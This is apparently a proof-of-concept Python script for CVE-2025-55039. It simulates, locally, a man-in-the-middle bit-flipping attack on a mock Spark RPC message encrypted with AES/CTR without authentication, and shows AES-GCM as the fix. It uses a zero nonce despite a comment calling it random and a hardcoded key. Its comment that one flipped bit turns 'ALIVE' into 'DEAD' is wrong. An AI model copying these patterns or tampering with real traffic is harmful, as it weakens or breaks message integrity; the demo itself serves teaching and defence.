# CVE-2025-55039 PoC - AES/CTR/NoPadding Bit-Flipping Attack on Spark RPC
# This PoC demonstrates the vulnerability concept of CTR mode bit-flipping
# without authentication on Spark RPC traffic
from Crypto.Cipher import AES
from Crypto.Util import Counter
import struct
# Simulated Spark RPC message structure
class SparkRPCMessage:
def __init__(self, msg_type, payload):
self.msg_type = msg_type # e.g., Heartbeat, BlockTransfer
self.payload = payload # Message data
def serialize(self):
# Simplified serialization: type (4 bytes) + payload
return struct.pack('>I', self.msg_type) + self.payload
# Vulnerable encryption using AES/CTR/NoPadding (Spark's insecure default)
def vulnerable_encrypt(key, plaintext):
"""Simulates Spark's default insecure encryption: AES/CTR/NoPadding"""
# CTR mode with random IV (nonce)
nonce = b'\x00' * 8 # Simplified nonce
ctr = Counter.new(64, prefix=nonce, initial_value=0)
cipher = AES.new(key, AES.MODE_CTR, counter=ctr)
ciphertext = cipher.encrypt(plaintext)
return nonce + ciphertext # Prepend nonce
def vulnerable_decrypt(key, ciphertext):
"""Decrypts using AES/CTR/NoPadding - no integrity check!"""
nonce = ciphertext[:8]
encrypted = ciphertext[8:]
ctr = Counter.new(64, prefix=nonce, initial_value=0)
cipher = AES.new(key, AES.MODE_CTR, counter=ctr)
plaintext = cipher.decrypt(encrypted)
return plaintext
# Secure alternative using AES/GCM/NoPadding
def secure_encrypt(key, plaintext, associated_data=b''):
"""Recommended fix: AES/GCM/NoPadding provides authenticated encryption"""
cipher = AES.new(key, AES.MODE_GCM)
ciphertext, tag = cipher.encrypt_and_digest(plaintext)
return cipher.nonce + ciphertext + tag
def mitm_bit_flip_attack(ciphertext, flip_position, flip_value):
"""
Demonstrates the MITM attack: flip bits in ciphertext
Since CTR mode has no authentication, modifications go undetected.
"""
modified = bytearray(ciphertext)
modified[flip_position] ^= flip_value
return bytes(modified)
# Demonstration
if __name__ == "__main__":
key = b'0123456789abcdef' # 16-byte AES key
# Create a legitimate Spark heartbeat message
heartbeat = SparkRPCMessage(
msg_type=1, # HEARTBEAT type
payload=b"status=ALIVE;timestamp=1234567890;node=worker-01"
)
plaintext = heartbeat.serialize()
print("[*] Original plaintext:", plaintext)
# Encrypt with vulnerable AES/CTR/NoPadding
ciphertext = vulnerable_encrypt(key, plaintext)
print("[*] Encrypted ciphertext (hex):", ciphertext.hex())
# Attacker intercepts and modifies ciphertext
# Flip a bit in the status field area to change ALIVE to DEAD
modified_ct = mitm_bit_flip_attack(ciphertext, 12, 0x01)
print("[*] Modified ciphertext (hex):", modified_ct.hex())
# Victim decrypts - NO authentication failure!
decrypted = vulnerable_decrypt(key, modified_ct)
print("[*] Decrypted after attack:", decrypted)
print("[!] Attack successful - message integrity compromised!")
# Compare with secure GCM mode
secure_ct = secure_encrypt(key, plaintext)
print("\n[*] Secure GCM ciphertext (hex):", secure_ct.hex())
print("[*] GCM mode would detect any tampering via authentication tag")